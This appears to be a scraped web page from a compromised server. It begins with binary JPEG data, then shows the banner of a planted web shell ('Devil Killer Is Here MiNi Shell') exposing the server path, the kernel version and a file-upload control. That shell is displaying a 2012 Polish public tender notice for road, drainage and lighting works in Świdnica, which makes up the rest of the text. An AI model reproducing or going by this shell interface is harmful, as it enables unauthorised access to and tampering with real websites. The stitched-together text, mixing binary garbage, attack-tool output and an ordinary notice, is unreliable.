JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120306/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120306/68652-N-2012.html

<p class="kh_header"><b>Świdnica: wykonanie robót budowlanych w ramach zadania:

Zagospodarowanie   terenu  ul. Parkowa - Podchorążych
 w Świdnicy  -  etap I - Budowa dróg Hetmańskiej i Kosynierów oraz infrastruktury podziemnej.</b><br>
<b>Numer ogłoszenia: 68652 - 2012; data zamieszczenia: 06.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Świdnicy , ul. Armii Krajowej 49, 58-100 Świdnica, woj. dolnośląskie, tel. 074 8562850, faks 074 8523110.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.swidnica.bip-gov.info.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> wykonanie robót budowlanych w ramach zadania:

Zagospodarowanie   terenu  ul. Parkowa - Podchorążych
 w Świdnicy  -  etap I - Budowa dróg Hetmańskiej i Kosynierów oraz infrastruktury podziemnej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3/ OPIS PRZEDMIOTU ZAMÓWIENIA

3.1 Lokalizacja

Inwestycja obejmuje budowę ulicy Kosynierów  i odcinka ulicy Hetmańskiej od ulicy Parkowej do skrzyżowania z ulicą Kosynierów w Świdnicy wraz z przebudową istniejącej infrastruktury podziemnej                            
na terenie działek nr 1/2,2/4,8/2,23,41,42,43,64,65,2/10, obręb 000-4 Śródmieście.
 
3.2. Opis przedmiotu i cel zamówienia

Przedmiotem zamówienia jest budowa dróg, kanalizacji deszczowej i oświetlenia ulicznego oraz przebudowa kolizji z istniejącym uzbrojeniem dla terenu położonego w Świdnicy między ulicami: Hetmańską (droga gminna) i ul. Podchorążych (obecnie ul. Rotmistrza Witolda Pileckiego -droga gminna) w północno-wschodniej części miasta .         
Ponadto zrealizowane zostaną dla przedmiotowego  zadania roboty budowlane wykonane przez Świdnickie Przedsiębiorstwo Wodociągów i Kanalizacji nie objęte niniejszą specyfikacją : budowa sieci wodociągowej i budowa kanalizacji sanitarnej.
Cel - nowoprojektowana droga (ulica Kosynierów) będzie stanowić drogę dojazdową do istniejącego Zespołu Szkół Specjalnych oraz obsługiwać strefę projektowanego osiedla mieszkaniowego, natomiast projektowana budowa drogi (ulica Hetmańska) ma na celu poprawę dostępności komunikacyjnej do funkcjonujących w tym rejonie instytucji świadczących usługi publiczne np.: Inspektorat  w Świdnicy ZUS, placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego, NZOZ Vita-Med.

SZCZEGÓŁOWY ZAKRES ROBÓT:
1.	Budowa drogi klasy L (ul. Hetmańska)   o szerokości 7,00 m , długości 192,50 m - w miejscach istniejącej  nawierzchni drogi przewiduje się wykonanie frezowania nawierzchni bitumicznej i ułożenie następującej konstrukcji: warstwa ścieralna - beton asfaltowy BA 0/12,8  gr. 5cm, warstwa wyrównawcza  - beton asfaltowy BA 0/25 gr. 7-8 cm, istniejąca podbudowa pozostała po frezowaniu z kruszywa kamiennego, istniejąca podbudowa z kruszywa kamiennego. 
2.	Budowa drogi klasy D (ul. Kosynierów) o szerokości 6,00 m, długości 262,70 m o następującej konstrukcji: warstwa ścieralna - beton asfaltowy BA 0/12,8 gr.5 cm, podbudowa zasadnicza - beton asfaltowy BA 0/25 gr 9 cm, podbudowa zasadnicza - kruszywo łamane stabilizowane mechanicznie 0/63 gr.25 cm, siatka kompozytowa typ TriAx wraz z geotkaniną separacyjną, warstwa wzmocnionego podłoża - kruszywo stabilizowane cementem gr. 20 cm.   
3.	Budowa chodników jednostronnych o szerokości 1,50-2.00 m z kostki betonowej.
4.	Budowa ścieżki rowerowej o szerokości 2,50 m z nawierzchni betonowej.


5.	Budowa parkingów o wymiarach 2,30 m x 4,50 m (w tym 8 parkingów dla niepełnosprawnych o wymiarach 3,60 m  x 4,50 m) o łącznej liczbie 71 miejsc do parkowania prostopadłego  na odcinku drogi (ul.  Kosynierów) z kostki betonowej.
6.	Budowa 24 betonowych wpustów deszczowych z rusztem żeliwnym z kołnierzem i kratą żeliwną, likwidacja 4 istniejących wpustów deszczowych.
7.	Budowa kanalizacji deszczowej  z rur PEHD o średnicach od O 250 do O 500 o długości    457,6 m  i wpięcie do istniejącej kanalizacji deszczowej znajdującej się w ul. Podchorążych (obecnie ul. Rotmistrza    W. Pileckiego).
8.	Likwidacja istniejącej, prowizorycznej sieci oświetlenia ulicznego na ul. Hetmańskiej (4 słupy oświetleniowe).
9.	Montaż 6 sztuk słupów SAL 8 dz z uchwytem na flagę na ul. Hetmańskiej zasilane kablem YAKY 4x35.
10.	Montaż 8 sztuk słupów SAL 4 dz bez uchwytu na flagę i 8 sztuk słupów SAL 8 dz z uchwytem na flagę na ul. Kosynierów zasilane kablem YAKY 4x35.  

Przedmiot zamówienia szczegółowo został opisany w specyfikacji technicznej wykonania i odbioru robót,
w projekcie budowlanym opracowanym przez Biuro Projektowania i Usług Technicznych PROKOM ul.Przesmyk 7, 58-200 Dzierżoniów.


Projekty i specyfikacje techniczne wykonania i odbioru robót stanowią załącznik do niniejszej specyfikacji i wraz z przedmiarami robót znajdują się na stronie internetowej Zamawiającego www.swidnica.bip-gov.info.pl w katalogu zamówienia publiczne. Dokumentacja projektowa znajduje się do wglądu w siedzibie Zamawiającego - Urząd Miejski w Świdnicy, przy ulicy Armii Krajowej nr 49, Referat Inwestycji - pok. 217. Przedmiary robót stanowią wyłącznie materiał pomocniczy dla wskazania technologii, która rzutuje na wysokość ceny Wykonawcy.


3.3. Zakres robót 

W  zakresie zadania ujęto wykonanie robót budowlanych zakwalifikowanych wg Wspólnego Słownika Zamówień do kategorii (kody CPV): 

45111000-8  Roboty w zakresie burzenia, roboty ziemne,
45233100-0 Roboty w zakresie budowy autostrad i dróg 
45233290-8 Instalowanie znaków drogowych
45231000-5 Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych
45233000-9 Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg
45112100-6 Roboty w zakresie kopania rowów
45231600-1 Roboty budowlane w zakresie linii komunikacyjnych
45314300-4 Instalowanie infrastruktury okablowania
45316110-9 Instalowanie drogowego sprzętu oświetleniowego
45311100-1 Roboty w zakresie okablowania elektrycznego 
4/ WARUNKI WYKONYWANIA ROBÓT:

4.1.    Zamawiający zapewnia nadzór inwestorski zgodnie z warunkami pozwolenia na budowę.
4.2.    Zamawiający zapewnia nadzór autorski.
4.3.    Przedmiot zamówienia należy realizować zgodnie ze specyfikacją techniczną wykonania i odbioru robót, 
         projektem, zasadami sztuki budowlanej oraz zgodnie z zasadami BHP. 
4.4.    Roboty budowlane powinny być wykonywane zgodnie z reżimem technologicznym, określonym przez
         Polskie  Normy, producentów poszczególnych elementów, produktów, materiałów i urządzeń. 
         Wszystkie użyte do budowy materiały powinny posiadać odpowiedni atest i świadectwo dopuszczenia, 
  wydane przez odpowiednie uprawnione instytucje, zezwalające na stosowanie ich w budownictwie.
  Dokumenty te przed wbudowaniem należy przedłożyć  inspektorowi nadzoru inwestorskiego i 
  Zamawiającemu.
4.5.    Wykonawca zobowiązany jest do przestrzegania warunków instytucji opiniujących projekt.
4.6.    Obsługa geodezyjna, inwentaryzacja powykonawcza, organizacja, oznakowanie i zagospodarowanie 
         zaplecza budowy, oraz inne nakłady nie stanowiące wartości robót budowlanych, a niezbędne do 
         wykonania  przedmiotu umowy należy objąć ceną ofertową.
4.7.   Inwentaryzację geodezyjną powykonawczą należy wykonać w formie drukowanej na pełnych arkuszach    
         sekcji w czterech egzemplarzach z potwierdzeniem przyjęcia do państwowego zasobu geodezyjnego i
         kartograficznego oraz formie numerycznej w formacie TIFF - 400 dpi w pełnych sekcjach bez   
         dodatkowych treści (pieczątek, metryk, zamalowań itp.). W operacie geodezyjnym należy zamieścić 
         zestawienia długości wykonanych sieci oraz powierzchni wykonanych nawierzchni (jezdni, 
         chodników,  itp.)
4.8.   Zamawiający zachowuje prawo dostępu do terenu budowy dla wskazanych przez siebie innych
         wykonawców,  a Wykonawca tego prawa nie może ograniczyć (np.: Zakład Gazowniczy,  Świdnickie
         Przedsiębiorstwo Wodociągów i Kanalizacji, archeolog  itp.). 
4.9.   Wykonawca jest odpowiedzialny za szkody powstałe w trakcie realizacji robót również wobec osób
        trzecich oraz w wyniku nieterminowego ich naprawienia.
  4.10.  Wykonawca będzie ponosił koszty organizacji terenu budowy, uzyska zgodę na zajęcie pasa drogowego
                    na czas prowadzenia robót, koszty oznakowania i zagospodarowania zaplecza budowy, zużycia wody
                    i energii w okresie realizacji robót, koszty utrzymania i konserwacji tymczasowych obiektów i urządzeń
                  związanych z terenem budowy oraz inne nakłady nie stanowiące wartości robót budowlanych, 
                    a niezbędne  do wykonania przedmiotu umowy. W/w koszty Wykonawca ujmie w cenie ofertowej.
              4.11. Wykonawca umieści na budowie w widocznym miejscu tablicę informacyjną, ogłoszenie zawierające
        dane dotyczące bezpieczeństwa pracy i ochrony zdrowia jak również umieści tablicę informacyjną wymaganą ze względu na współfinansowanie inwestycji z Narodowego Programu Przebudowy Dróg Lokalnych - Etap II Bezpieczeństwo- Dostępność- Rozwój (treść do uzgodnienia z Zamawiającym).
              4.12.  Wykonawca zapewni sprawowanie kierownictwa budowy i robót przez osoby posiadające odpowiednie
         kwalifikacje zawodowe i uprawnienia do kierowania robotami budowlanymi w odpowiednich 
                     specjalnościach, zgodnie z wymogami Prawa Budowlanego.
           4.13.  Wykonawca zobowiązany będzie do utrzymania i konserwacji nawierzchni na terenie budowy w okresie
                     przejściowym tj. obejmującym czas od udostępnienia nawierzchni dla ruchu tymczasowego do odbioru
         końcowego robót.
4.14.  Wykonawca zrealizuje własnym staraniem tymczasowe obiekty i urządzenia na terenie placu budowy: 
          punkt poboru wody, punkt poboru energii elektrycznej, zabezpieczenie terenu budowy. 
4.15.  Wykonawca ma obowiązek we własnym zakresie i na własny koszt sporządzić projekt zastępczej   
         organizacji ruchu na czas wykonywania swoich prac wraz z jej wykonaniem. 
4.16. Wykonawca zobowiązany jest do przekazania na właściwe wysypisko odpadów materiałów 
         z rozbiórki a nie  nadających się do ponownego wbudowania.
4.17. Wszelkie rozbieżności stwierdzone w trakcie prowadzenia robót pomiędzy założeniami przyjętymi
         w  projekcie a stanem faktycznym, mającymi wpływ na prawidłowe wykonanie prac, będą uzgadniane 
         z projektantem w ramach nadzoru autorskiego.
4.18.  Po wyborze oferty, przed podpisaniem umowy, Wykonawca przedłoży Zamawiającemu uzgodniony
          z Zamawiającym harmonogram rzeczowo-finansowe realizacji zamówienia.
 4.19. Za koordynację robót branżowych i prowadzenie dokumentacji budowy odpowiadać będzie kierownik 
         budowy. 

5  WARUNKI ODBIORU ROBÓT.
1     Wykonawca zgłasza inspektorowi nadzoru do odbioru wszystkie roboty zanikowe.
2.    Odbiory częściowe robót będą zakończone protokołami odbioru elementów wykonanych robót
       potwierdzonymi przez inspektora nadzoru.
3.  Dokumentem potwierdzającym przejęcie przez Zamawiającego wykonanego przedmiotu zamówienia jest protokół końcowy odbioru robót, podpisany przez strony umowy, którego integralną częścią będą dokumenty niżej wymienione dostarczone przez Wykonawcę inspektorowi nadzoru inwestorskiego w dniu zgłoszenia gotowości do odbioru końcowego zadania  w tym: 
     - oryginał dziennika budowy, 
     - protokoły technicznego odbioru robót związanych z wykonywaniem przedmiotu zamówienia, 
     - dokumentację powykonawczą, 
     - atesty i aprobaty na wbudowane materiały, 
     - protokoły badań i sprawdzeń jakości robót i materiałów, w tym świadectwa zezwalające na stosowanie
       materiałów w budownictwie,
     - inwentaryzację geodezyjną powykonawczą,
     - oświadczenie kierownika budowy:
-	 o zgodności wykonania obiektu budowlanego z projektem budowlanym i warunkami pozwolenia na
   budowę oraz przepisami,
-	 o doprowadzeniu do należytego stanu i porządku terenu budowy, a także - w razie korzystania ulicy,
  sąsiedniej nieruchomości, budynku lub lokalu;
     - kartę gwarancyjną na wykonane roboty budowlane.
4.  Zamawiający przystąpi do czynności odbiorowych przedmiotu zamówienia w terminie do 10 dni roboczych   
     od  daty zgłoszenia gotowości do odbioru robót. Podstawą rozpoczęcia czynności odbioru końcowego 
     będzie  zawiadomienie pisemne Wykonawcy, wpis kierownika budowy do dziennika budowy o zakończeniu 
     wszystkich robót będących przedmiotem zamówienia potwierdzony ze strony Zamawiającego przez 
          inspektora nadzoru oraz potwierdzenie inspektora nadzoru kompletności przekazanych mu przez 
          Wykonawcę dokumentów odbiorowych. 
5. Podstawą do podpisania przez Zamawiającego protokołu końcowego odbioru robót będzie bezusterkowe  wykonanie przedmiotu zamówienia. Zakończenie robót i zgłoszenie przez Wykonawcę gotowości do odbioru końcowego nastąpić winno w terminie gwarantującym możliwość zakończenia czynności odbiorowych i podpisania protokołu końcowego odbioru robót w nieprzekraczalnym terminie do 31.10.2012 r.
6.  Po zakończeniu robót Wykonawca zobowiązany jest do uporządkowania terenu budowy i przekazania 
     go  Zamawiającemu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających na podstawie art.67 ust.1                pkt 6 ustawy PZP.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.10.00-8, 45.23.31.00-0, 45.23.32.90-8, 45.23.10.00-5, 45.23.30.00-9, 45.11.21.00-6, 45.23.16.00-1, 45.31.43.00-4, 45.31.61.10-9, 45.31.11.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Oferta powinna być zabezpieczona wadium w wysokości: 70.000,00 zł (słownie: siedemdziesiąt tysięcy złotych  00/100).
Wadium winno zostać wniesione przed upływem terminu składania ofert, tj. przed 26.03.2012 r. przed godz. 09.00.
2.Wadium może być wniesione w formach określonych w art.45 ust.6 ustawy Prawo Zamówień Publicznych</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert,
       a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał z należytą 

       starannością, co najmniej dwa zamówienia o wartości robót nie mniejszej niż 1.500.000,00 zł brutto każde 
       na budowę  dróg, sieci kanalizacji deszczowej i oświetlenia ulicznego ( przez określenie wartości robót  
       zamówienia należy rozumieć łączną wartość robót wszystkich branż )  ,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do 
    wykonania niniejszego zamówienia posiadającymi uprawnienia budowlane do kierowania robotami 
    budowlanymi bez ograniczeń w specjalnościach: konstrukcyjno-budowlanej i kierowania 
           robotami budowlanymi w zakresie budowy dróg, instalacyjnej  w zakresie sieci i urządzeń  kanalizacyjnych i gazowych oraz instalacyjnej w zakresie sieci i urządzeń elektrycznych i energetycznych,            
wymaganych Prawem Budowlanym ze wskazaniem osoby, która będzie pełniła funkcję kierownika budowy i uprawnioną do kierowania robotami budowlanymi przewidzianą do realizacji niniejszego zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnego do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że posiada środki finansowe lub zdolność kredytową w wysokości  min. 800.000,00 zł (osiemset tysięcy złotych) oraz wykaże, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na sumę ubezpieczenia nie mniejszą jak: 500.000,00 zł. (pięćset tysięcy złotych).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

